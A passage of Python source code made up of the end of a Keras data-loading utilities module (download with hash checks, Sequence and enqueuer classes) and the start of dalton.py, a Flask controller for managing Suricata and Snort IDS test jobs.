urlretrieve(origin, fpath, DLProgbar())
except urllib.error.HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except urllib.error.URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
# Validate download if succeeded and user provided an expected hash
# Security conscious users would get the hash of the file from a separate
# channel and pass it to this API to prevent MITM / corruption:
if os.path.exists(fpath) and file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
raise ValueError(
f'Incomplete or corrupted file detected. The {hash_algorithm} '
f'file hash does not match the provided value of {file_hash}.')
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _makedirs_exist_ok(datadir):
os.makedirs(datadir, exist_ok=True) # pylint: disable=unexpected-keyword-arg
def _resolve_hasher(algorithm, file_hash=None):
"""Returns hash algorithm as hashlib function."""
if algorithm == 'sha256':
return hashlib.sha256()
if algorithm == 'auto' and file_hash is not None and len(file_hash) == 64:
return hashlib.sha256()
# This is used only for legacy purposes.
return hashlib.md5()
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
Example:
```python
_hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
Args:
fpath: path to the file being validated
algorithm: hash algorithm, one of `'auto'`, `'sha256'`, or `'md5'`.
The default `'auto'` detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
The file hash
"""
if isinstance(algorithm, str):
hasher = _resolve_hasher(algorithm)
else:
hasher = algorithm
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
Args:
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
Whether the file is valid
"""
hasher = _resolve_hasher(algorithm, file_hash)
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
class ThreadsafeIter:
"""Wrap an iterator with a lock and propagate exceptions to all threads."""
def __init__(self, it):
self.it = it
self.lock = threading.Lock()
# After a generator throws an exception all subsequent next() calls raise a
# StopIteration Exception. This, however, presents an issue when mixing
# generators and threading because it means the order of retrieval need not
# match the order in which the generator was called. This can make it appear
# that a generator exited normally when in fact the terminating exception is
# just in a different thread. In order to provide thread safety, once
# self.it has thrown an exception we continue to throw the same exception.
self._exception = None
def __iter__(self):
return self
def next(self):
return self.__next__()
def __next__(self):
with self.lock:
if self._exception:
raise self._exception # pylint: disable=raising-bad-type
try:
return next(self.it)
except Exception as e:
self._exception = e
raise
def threadsafe_generator(f):
@functools.wraps(f)
def g(*a, **kw):
return ThreadsafeIter(f(*a, **kw))
return g
@keras_export('keras.utils.Sequence')
class Sequence:
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`.
The method `__getitem__` should return a complete batch.
Notes:
`Sequence` are a safer way to do multiprocessing. This structure guarantees
that the network will only train once
on each sample per epoch which is not the case with generators.
Examples:
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
import math
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
Args:
index: position of the batch in the Sequence.
Returns:
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
Returns:
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
def iter_sequence_infinite(seq):
"""Iterates indefinitely over a Sequence.
Args:
seq: `Sequence` instance.
Yields:
Batches of data from the `Sequence`.
"""
while True:
for item in seq:
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
# Because multiprocessing pools are inherently unsafe, starting from a clean
# state can be essential to avoiding deadlocks. In order to accomplish this, we
# need to be able to check on the status of Pools that we create.
_DATA_POOLS = weakref.WeakSet()
_WORKER_ID_QUEUE = None # Only created if needed.
_WORKER_IDS = set()
_FORCE_THREADPOOL = False
_FORCE_THREADPOOL_LOCK = threading.RLock()
def dont_use_multiprocessing_pool(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
with _FORCE_THREADPOOL_LOCK:
global _FORCE_THREADPOOL
old_force_threadpool, _FORCE_THREADPOOL = _FORCE_THREADPOOL, True
out = f(*args, **kwargs)
_FORCE_THREADPOOL = old_force_threadpool
return out
return wrapped
def get_pool_class(use_multiprocessing):
global _FORCE_THREADPOOL
if not use_multiprocessing or _FORCE_THREADPOOL:
return multiprocessing.dummy.Pool # ThreadPool
return multiprocessing.Pool
def get_worker_id_queue():
"""Lazily create the queue to track worker ids."""
global _WORKER_ID_QUEUE
if _WORKER_ID_QUEUE is None:
_WORKER_ID_QUEUE = multiprocessing.Queue()
return _WORKER_ID_QUEUE
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
Args:
uid: int, Sequence identifier
i: index
Returns:
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
@keras_export('keras.utils.SequenceEnqueuer')
class SequenceEnqueuer:
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
Example:
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.stop()
```
The `enqueuer.get()` should be an infinite stream of data.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
Args:
workers: Number of workers.
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: get_pool_class(False)(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Sends current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Args:
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
def __del__(self):
if self.is_running():
self.stop()
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
@keras_export('keras.utils.OrderedEnqueuer')
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Args:
sequence: A `tf.keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, None, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
while self.is_running():
try:
inputs = self.queue.get(block=True, timeout=5).get()
if self.is_running():
self.queue.task_done()
if inputs is not None:
yield inputs
except queue.Empty:
pass
except Exception as e: # pylint: disable=broad-except
self.stop()
raise e
def init_pool_generator(gens, random_seed=None, id_queue=None):
"""Initializer function for pool workers.
Args:
gens: State which should be made available to worker processes.
random_seed: An optional value with which to seed child processes.
id_queue: A multiprocessing Queue of worker ids. This is used to indicate
that a worker process was created by Keras and can be terminated using
the cleanup_all_keras_forkpools utility.
"""
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
worker_proc = multiprocessing.current_process()
# name isn't used for anything, but setting a more descriptive name is helpful
# when diagnosing orphaned processes.
worker_proc.name = 'Keras_worker_{}'.format(worker_proc.name)
if random_seed is not None:
np.random.seed(random_seed + worker_proc.ident)
if id_queue is not None:
# If a worker dies during init, the pool will just create a replacement.
id_queue.put(worker_proc.ident, block=True, timeout=0.1)
def next_sample(uid):
"""Gets the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
Args:
uid: int, generator identifier
Returns:
The next value of generator `uid`.
"""
return next(_SHARED_SEQUENCES[uid])
@keras_export('keras.utils.GeneratorEnqueuer')
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Args:
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, generator,
use_multiprocessing=False,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(generator, use_multiprocessing)
self.random_seed = random_seed
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of works.
Returns:
A Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, self.random_seed, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
for f in last_ones:
f.wait()
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e: # pylint: disable=broad-except
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
'Your generator is NOT thread-safe. '
'Keras requires a thread-safe generator when '
'`use_multiprocessing=False, workers > 1`. ')
raise e
|
dalton.py
|
#!/usr/local/bin/python
"""
Dalton - a UI and management tool for submitting and viewing IDS jobs
"""
# Copyright 2017 Secureworks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# app imports
from flask import Blueprint, render_template, request, Response, redirect, url_for
#from flask_login import current_user
import hashlib
import os
import glob
import re
import redis
import datetime
import time
import json
import zipfile
import tarfile
import gzip
import bz2
import sys
import shutil
from distutils.version import LooseVersion
import ConfigParser
import logging
from logging.handlers import RotatingFileHandler
import subprocess
from ruamel import yaml
import base64
import cStringIO
import traceback
import subprocess
import random
from threading import Thread
import tempfile
# setup the dalton blueprint
dalton_blueprint = Blueprint('dalton_blueprint', __name__, template_folder='templates/dalton/')
# logging
file_handler = RotatingFileHandler('/var/log/dalton.log', 'a', 1 * 1024 * 1024, 10)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s'))
logger = logging.getLogger("dalton")
logger.addHandler(file_handler)
logger.setLevel(logging.INFO)
logger.info("Logging started")
try:
dalton_config_filename = 'dalton.conf'
dalton_config = ConfigParser.SafeConfigParser()
dalton_config.read(dalton_config_filename)
# user-configurable variables; see comments in dalton.conf for details.
TEMP_STORAGE_PATH = dalton_config.get('dalton', 'temp_path')
VARIABLES_STORAGE_PATH = dalton_config.get('dalton', 'var_path')
RULESET_STORAGE_PATH = dalton_config.get('dalton', 'ruleset_path')
JOB_STORAGE_PATH = dalton_config.get('dalton', 'job_path')
CONF_STORAGE_PATH = dalton_config.get('dalton', 'engine_conf_path')
REDIS_EXPIRE = (dalton_config.getint('dalton', 'redis_expire') * 60)
TEAPOT_REDIS_EXPIRE = (dalton_config.getint('dalton', 'teapot_redis_expire') * 60)
JOB_RUN_TIMEOUT = dalton_config.getint('dalton', 'job_run_timeout')
AGENT_PURGE_TIME = dalton_config.getint('dalton', 'agent_purge_time')
REDIS_HOST = dalton_config.get('dalton', 'redis_host')
API_KEYS = dalton_config.get('dalton', 'api_keys')
MERGECAP_BINARY = dalton_config.get('dalton', 'mergecap_binary')
U2_ANALYZER = dalton_config.get('dalton', 'u2_analyzer')
RULECAT_SCRIPT = dalton_config.get('dalton', 'rulecat_script')
MAX_PCAP_FILES = dalton_config.getint('dalton', 'max_pcap_files')
DEBUG = dalton_config.getboolean('dalton', 'debug')
#options for flowsynth
FS_BIN_PATH = dalton_config.get('flowsynth-web', 'bin_path') #Path to the flowsynth application
FS_PCAP_PATH = dalton_config.get('flowsynth-web', 'pcap_path') #Path to temporarily store PCAPs
except Exception as e:
logger.critical("Problem parsing config file '%s': %s" % (dalton_config_filename, e))
if DEBUG or ("CONTROLLER_DEBUG" in os.environ and int(os.getenv("CONTROLLER_DEBUG"))):
logger.setLevel(logging.DEBUG)
logger.debug("DEBUG logging enabled")
if not MERGECAP_BINARY or not os.path.exists(MERGECAP_BINARY):
logger.error("mergecap binary '%s' not found. Suricata jobs cannot contain more than one pcap." % MERGECAP_BINARY)
MERGECAP_BINARY = None
if not os.path.exists(U2_ANALYZER):
logger.error("U2 Analyzer '%s' not found. Cannot process alert details." % U2_ANALYZER)
U2_ANALYZER = None
elif U2_ANALYZER.endswith(".py"):
# assumes 'python' binary in path
U2_ANALYZER = "%s %s" % ("python", U2_ANALYZER)
else:
logger.error("U2 Analyzer '%s' does not end in .py. Cannot process alert details." % U2_ANALYZER)
#connect to the datastore
try:
r = redis.Redis(REDIS_HOST)
except Exception as e:
logger.critical("Problem connecting to Redis host '%s': %s" % (REDIS_HOST, e))
# if there are no rules, use idstools rulecat to download a set for Suri and Snort
# if rulecat fails (eaten by proxy), empty rules file(s) may be created
if os.path.exists(RULECAT_SCRIPT):
for engine in ['suricata', 'snort']:
ruleset_dir = os.path.join(RULESET_STORAGE_PATH, engine)
rules = [f for f in os.listdir(ruleset_dir) if (os.path.isfile(os.path.join(ruleset_dir, f)) and f.endswith(".rules"))]
if len(rules) == 0:
filename = "ET-%s-all-%s.rules" % (datetime.datetime.utcnow().strftime("%Y%m%d"), engine)
logger.info("No rulesets for %s found. Downloading the latest ET set as '%s'" % (engine, filename))
if engine == "suricata":
url = "https://rules.emergingthreats.net/open/suricata-1.3/emerging.rules.tar.gz"
if engine == "snort":
url = "https://rules.emergingthreats.net/open/snort-2.9.0/emerging.rules.tar.gz"
command = "python %s --url %s --merged %s" % (RULECAT_SCRIPT, url, os.path.join(ruleset_dir, filename))
try:
subprocess.call(command, stdin=None, stdout=None, stderr=None, shell=True)
except Exception as e:
logger.info("Unable to download ruleset for %s" % engine)
logger.debug("Exception: %s" % e)
# check for sane timeout values
if REDIS_EXPIRE <= 0:
logger.critical("redis_expire value of %d minutes is invalid. Expect problems." % dalton_config.getint('dalton', 'redis_expire'))
if TEAPOT_REDIS_EXPIRE <= 0:
logger.critical("teapot_redis_expire value of %d minutes is invalid. Expect problems." % dalton_config.getint('dalton', 'teapot_redis_expire'))
if AGENT_PURGE_TIME <= 1:
logger.critical("agent_purge_time value of %d seconds is invalid. Expect problems." % AGENT_PURGE_TIME)
if JOB_RUN_TIMEOUT <= 4:
logger.critical("job_run_time value of %d seconds is invalid. Expect problems." % JOB_RUN_TIMEOUT)
if TEAPOT_REDIS_EXPIRE > REDIS_EXPIRE:
logger.warn("teapot_redis_expire value %d greater than redis_expire value %d. This is not recommended and may result in teapot jobs being deleted from disk before they expire in Redis." % (TEAPOT_REDIS_EXPIRE, REDIS_EXPIRE))
# other checks
if MAX_PCAP_FILES < 1:
default_max = 8
logger.warn("max_pcap_files value of '%d' invalid. Using '%d'" % (MAX_PCAP_FILES, default_max))
MAX_PCAP_FILES = default_max
sensor_tech_re = re.compile(r"^[a-zA-Z0-9\x2D\x2E\x5F]+$")
#global values used by Flask
TRAP_BAD_REQUEST_KEY_ERRORS = True
#status codes
STAT_CODE_INVALID = -1
STAT_CODE_QUEUED = 0
STAT_CODE_RUNNING = 1
STAT_CODE_DONE = 2
STAT_CODE_INTERRUPTED = 3
STAT_CODE_TIMEOUT = 4
# engine technologies supported; used for validation (sometimes)
supported_engines = ['suricata', 'snort']
logger.info("Dalton Started.")
def delete_temp_files(job_id):
""" deletes temp files for given job ID"""
global TEMP_STORAGE_PATH
if os.path.exists(TEMP_STORAGE_PATH):
for file in glob.glob(os.path.join(TEMP_STORAGE_PATH, "%s*" % job_id)):
if os.path.isfile(file):
os.unlink(file)
if os.path.exists(os.path.join(TEMP_STORAGE_PATH, job_id)):
shutil.rmtree(os.path.join(TEMP_STORAGE_PATH, job_id))
def verify_temp_storage_path():
"""verify and create if necessary the temp location where we will store files (PCAPs, configs, etc.)
when build a job zip file
"""
global TEMP_STORAGE_PATH
if not os.path.exists(TEMP_STORAGE_PATH):
os.makedirs(TEMP_STORAGE_PATH)
return True
@dalton_blueprint.route('/dalton/controller_api/get-prod-rulesets/<engine>', methods=['GET'])
def api_get_prod_rulesets(engine):
global supported_engines
if engine is None or engine == '' or engine not in supported_engines:
return Response("Invalid 'engine' supplied. Must be one of %s.\nExample URI:\n\n/dalton/controller_api/get-prod-rulesets/suricata" % supported_engines,
status=400, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
# return json
ruleset_list = []
# this is a 2D array with filename and full path for each rules file
# but this function only returns a 1D array with full paths
current_rulesets = get_rulesets(engine)
for ruleset in current_rulesets:
if len(ruleset) > 1:
ruleset_list.append(ruleset[1])
json_response = {'prod-rulesets': ruleset_list}
return Response(json.dumps(json_response), status=200, mimetype='application/json', headers = {'X-Dalton-Webapp':'OK'})
def get_rulesets(engine=''):
""" return a list of locally stored ruleset for jobs to use """
global RULESET_STORAGE_PATH
ruleset_list = []
logger.debug("in get_rulesets(engine=%s)" % engine)
# engine var should already be validated but just in case
if not re.match(r"^[a-zA-Z0-9\_\-\.]*$", engine):
logger.error("Invalid engine value '%s' in get_rulesets()" % engine)
return ruleset_list
ruleset_dir = os.path.join(RULESET_STORAGE_PATH, engine)
if not os.path.isdir(ruleset_dir):
logger.error("Could not find ruleset directory '%s'" % ruleset_dir)
return ruleset_list
file_list = os.listdir(ruleset_dir)
# do we want to descend into directories?
for file in file_list:
if not os.path.isfile(os.path.join(ruleset_dir, file)):
continue
if os.path.splitext(file)[1] == '.rules':
# just add file (base) for now so we can sort; build 2D list on return
ruleset_list.append(os.path.basename(file))
#sort
ruleset_list.sort(reverse=True)
# return 2D array with base and full path
return [[file, os.path.join(ruleset_dir, file)] for file in ruleset_list]
def set_job_status_msg(jobid, msg):
"""set a job's status message """
global r
r.set("%s-status" % jobid, msg)
# status keys do not expire if/when they are queued
if msg != "Queued":
if r.get("%s-teapotjob" % jobid):
r.expire("%s-status" % jobid, TEAPOT_REDIS_EXPIRE)
else:
r.expire("%s-status" % jobid, REDIS_EXPIRE)
def get_job_status_msg(jobid):
"""returns a job's status message"""
global r
return r.get("%s-status" % jobid)
def set_job_status(jobid, status):
"""set's a job status code"""
global r
r.set("%s-statcode" % jobid, status)
# statcode keys do not expire if/when they are queued
if status != STAT_CODE_QUEUED:
if r.get("%s-teapotjob" % jobid):
r.expire("%s-statcode" % jobid, TEAPOT_REDIS_EXPIRE)
else:
r.expire("%s-statcode" % jobid, REDIS_EXPIRE)
def get_job_status(jobid):
"""return a job's status code"""
global r
return r.get("%s-statcode" % jobid)
def set_keys_timeout(jobid):
"""set timeout of REDIS_EXPIRE seconds on keys that (should) be set when job results are posted"""
EXPIRE_VALUE = REDIS_EXPIRE
if r.get("%s-teapotjob" % jobid):
EXPIRE_VALUE = TEAPOT_REDIS_EXPIRE
try:
r.expire("%s-ids" % jobid, EXPIRE_VALUE)
r.expire("%s-perf" % jobid, EXPIRE_VALUE)
r.expire("%s-alert" % jobid, EXPIRE_VALUE)
r.expire("%s-error" % jobid, EXPIRE_VALUE)
r.expire("%s-debug" % jobid, EXPIRE_VALUE)
r.expire("%s-time" % jobid, EXPIRE_VALUE)
r.expire("%s-alert_detailed" % jobid, EXPIRE_VALUE)
r.expire("%s-other_logs" % jobid, EXPIRE_VALUE)
r.expire("%s-teapotjob" % jobid, EXPIRE_VALUE)
except:
pass
def expire_all_keys(jid):
"""expires (deletes) all keys for a give job ID"""
# using the redis keys function ('r.keys("%s-*" % jid)') searches thru all keys which is not
# efficient for large key sets so we are deleting each one individually
global r
logger.debug("Dalton calling expire_all_keys() on job %s" % jid)
keys_to_delete = ["ids", "perf", "alert", "alert_detailed", "other_logs", "error", "debug", "time", "statcode", "status", "start_time", "user", "tech", "submission_time", "teapotjob"]
try:
for cur_key in keys_to_delete:
r.delete("%s-%s" % (jid, cur_key))
except:
pass
def check_for_timeout(jobid):
"""checks to see if a job has been running more than JOB_RUN_TIMEOUT seconds and sets it to STAT_CODE_TIMEOUT and sets keys to expire"""
global r
try:
start_time = int(r.get("%s-start_time" % jobid))
except:
start_time = int(time.time()) - (JOB_RUN_TIMEOUT + 1)
#logger.debug("Dalton in check_for_timeout(): job %s start time: %d" % (jobid, start_time))
if not start_time or ((int(time.time()) - start_time) > JOB_RUN_TIMEOUT):
if int(get_job_status(jobid)) == STAT_CODE_RUNNING:
logger.info("Dalton in check_for_timeout(): job %s timed out. Start time: %d, now: %d" % (jobid, start_time, int(time.time())))
set_job_status(jobid, STAT_CODE_TIMEOUT)
set_job_status_msg(jobid, "Job %s has timed out, please try submitting the job again." % jobid)
set_keys_timeout(jobid)
return True
else:
return False
else:
return False
@dalton_blueprint.route('/dalton/controller_api/delete-old-job-files', methods=['GET'])
def delete_old_job_files():
"""Deletes job files on disk if modificaiton time exceeds expire time(s)"""
global REDIS_EXPIRE, TEAPOT_REDIS_EXPIRE, JOB_STORAGE_PATH, logger
total_deleted = 0
# this coded but not enabled since there isn't any authentication and I don't think
# anyone should be able to delete jobs older than any arbitrary number of minutes
if request:
mmin = request.args.get('mmin')
teapot_mmin = request.args.get('teapot_mmin')
if mmin is not None:
logger.warn("Passing a mmin value to delete_old_job_files() is currently not enabled. Using %d seconds for regular jobs." % REDIS_EXPIRE)
if teapot_mmin is not None:
logger.warn("Passing a teapot_mmin value to delete_old_job_files() is currently not enabled. Using %d seconds for teapot jobs." % TEAPOT_REDIS_EXPIRE)
# these values represent number of minutes
job_mmin = REDIS_EXPIRE
teapot_mmin = TEAPOT_REDIS_EXPIRE
if os.path.exists(JOB_STORAGE_PATH):
now = time.time()
# assumption is REDIS_EXPIRE >= TEAPOT_REDIS_EXPIRE
for file in glob.glob(os.path.join(JOB_STORAGE_PATH, "*.zip")):
if os.path.isfile(file):
mtime = os.path.getmtime(file)
if (now-mtime) > REDIS_EXPIRE:
logger.debug("Deleting job file '%s'. mtime %s; now %s; diff %d seconds; expire threshold %d seconds" % (os.path.basename(file), now, mtime, (now-mtime), REDIS_EXPIRE))
os.unlink(file)
total_deleted += 1
for file in glob.glob(os.path.join(JOB_STORAGE_PATH, "teapot_*.zip")):
if os.path.isfile(file):
mtime = os.path.getmtime(file)
if (now-mtime) > TEAPOT_REDIS_EXPIRE:
logger.debug("Deleting teapot job file '%s'. mtime %s; now %s; diff %d seconds; expire threshold %d seconds" % (os.path.basename(file), now, mtime, (now-mtime), TEAPOT_REDIS_EXPIRE))
os.unlink(file)
total_deleted += 1
if total_deleted > 0:
logger.info("Deleted %d job file(s) from disk." % total_deleted)
# returning a string so Flask can render it; calling functions that use the
# return value need to cast it back to int if they wish to use it as an int
return str(total_deleted)
@dalton_blueprint.route('/')
def index():
return redirect('/dalton/')
@dalton_blueprint.route('/dalton')
@dalton_blueprint.route('/dalton/')
#@login_required()
def page_index():
"""the default homepage for Dalton"""
return render_template('/dalton/index.html', page='')
# this is technically 'controller_api' but supporting 'sensor_api' since
# previous versions had that
@dalton_blueprint.route('/dalton/sensor_api/request_engine_conf/<sensor>', methods=['GET'])
@dalton_blueprint.route('/dalton/controller_api/request_engine_conf/<sensor>', methods=['GET'])
#@auth_required()
def api_get_engine_conf_file(sensor):
global supported_engines
if sensor is None:
return Response("Invalid 'sensor' supplied.",
status=400, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
return Response(json.dumps(get_engine_conf_file(sensor)), status=200, mimetype='application/json', headers = {'X-Dalton-Webapp':'OK'})
def get_engine_conf_file(sensor):
""" return the corresponding configuration file for passed in sensor (engine and version)
also returns the variables (stripped out from config)
"""
# user's browser should be making request to dynamically update 'coverage' submission page
try:
conf_file = None
vars_file = None
(engine, version) = sensor.split('-', 1)
epath = os.path.join(CONF_STORAGE_PATH, engine)
filelist = [f for f in os.listdir(epath) if os.path.isfile(os.path.join(epath, f))]
# assumes an extension (e.g. '.yaml', '.conf') on engine config files
files = [f for f in filelist if LooseVersion(os.path.splitext(f)[0]) <= LooseVersion(sensor)]
if len(files) > 0:
files.sort(key=lambda v:LooseVersion(os.path.splitext(v)[0]), reverse=True)
conf_file = os.path.join(epath, files[0])
logger.debug("in get_engine_conf_file: passed sensor value: '%s', conf file used: '%s'" % (sensor, os.path.basename(conf_file)))
engine_config = ''
variables = ''
if conf_file:
# open, read, return
# Unix newline is \n but for display on web page, \r\n is desired in some
# browsers/OSes. Note: currently not converted back on job submit.
fh = open(conf_file, 'rb')
if engine.lower().startswith('suri'):
# need the read() method to load the yaml
contents = fh.read()
else:
# want to parse each line so put it in to a list
contents = fh.readlines()
fh.close()
# extract out variables
if engine.lower().startswith('snort'):
ignore_vars = ("RULE_PATH", "SO_RULE_PATH", "PREPROC_RULE_PATH", "WHITE_LIST_PATH", "BLACK_LIST_PATH")
lines = iter(contents)
while True:
try:
line = next(lines).rstrip('\r\n')
if not (line.startswith("var ") or line.startswith("portvar ") or line.startswith("ipvar ")):
